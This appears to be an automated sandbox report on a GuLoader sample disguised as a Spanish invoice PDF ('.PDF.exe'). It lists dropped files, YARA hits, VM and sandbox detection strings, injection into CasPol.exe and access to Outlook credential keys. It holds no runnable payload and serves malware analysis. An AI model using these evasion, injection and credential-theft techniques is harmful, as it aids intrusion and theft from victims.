Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Replyingly\Avnbgen\Spisekamrenes

Jump to behavior

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: @cn.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb\| source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb)Q source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.0.dr
Source:	Binary string: System.Reflection.TypeExtensions.ni.pdb source: System.Reflection.TypeExtensions.dll.0.dr
Source:	Binary string: C:\Windows\caspol.pdbpdbpol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\exe\caspol.pdby33o source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1859898012.0000000003AEF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\caspol.pdbd source: CasPol.exe, 0000000B.00000002.1859898012.0000000003AEF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: ;6##.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDSrMV9 source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdbGhY source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbp source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: bwcaspol.PDB 8: source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.TypeExtensions\net6.0-Release\System.Reflection.TypeExtensions.pdb source: System.Reflection.TypeExtensions.dll.0.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?cnC:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.PDBFiV source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.pdbSystem.Core.dll source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: 3symbols\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: 96HPWn,C:\Windows\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: caspol.pdbcaspol.pdbpdbpol.pdb\v4.0.30319\caspol.pdbp source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1415606595.0000000005E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1415606595.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1786467995.0000000000FC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\Talestrmmene.Unr, type: DROPPED

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B4C0D push edi; iretd	0_2_048B4C0E
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B4C15 push edi; iretd	0_2_048B4C16
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B5A6C push cs; ret	0_2_048B5A71
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B2072 push FFFFFF83h; retf	0_2_048B209F
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B7C71 push es; iretd	0_2_048B7C74
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B4BAE push edi; iretd	0_2_048B4BBA
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B4BC1 push edi; iretd	0_2_048B4BC2
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B71FA push esi; ret	0_2_048B71FD
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B7DFA pushfd ; retf	0_2_048B7E05
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B4B26 push eax; retf	0_2_048B4B3D
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_048B0D3A pushad ; ret	0_2_048B0D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC7C71 push es; iretd	11_2_00FC7C74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC2072 push FFFFFF83h; retf	11_2_00FC209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC5A6C push cs; ret	11_2_00FC5A71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC4C15 push edi; iretd	11_2_00FC4C16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC4C0D push edi; iretd	11_2_00FC4C0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC71FA push esi; ret	11_2_00FC71FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC7DFA pushfd ; retf	11_2_00FC7E05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC4BC1 push edi; iretd	11_2_00FC4BC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC4BAE push edi; iretd	11_2_00FC4BBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC0D3A pushad ; ret	11_2_00FC0D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00FC4B26 push eax; retf	11_2_00FC4B3D

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: System.Reflection.Primitives.dll.0.dr

Static PE information: 0xE40AD0DE [Wed Mar 28 09:54:38 2091 UTC]

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	File created: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dll	Jump to dropped file
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	File created: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\AdvSplash.dll	Jump to dropped file
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	File created: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\System.Reflection.Primitives.dll	Jump to dropped file
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	File created: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: rFACTURA_FAC_2023_1-1000733.PDF.exe

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1414281617.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEA
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1414281617.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dll			Jump to dropped file
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\System.Reflection.Primitives.dll			Jump to dropped file

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040596D
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_004065A2 FindFirstFileW,FindClose,	0_2_004065A2
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	API call chain: ExitProcess graph end node			graph_0-4900
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	API call chain: ExitProcess graph end node			graph_0-4895

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1414281617.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exea
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1414281617.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

0_2_10001B18

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Code function: 0_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,

0_2_00401E43

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: FC0000

Jump to behavior

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

0_2_00403350

Source: Amcache.hve.15.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
Source: CasPol.exe, 0000000B.00000002.1876903989.00000000341E1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1876903989.00000000342A5000.00000004.00000800.00020000.00000000.sdmp, Amcache.hve.15.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
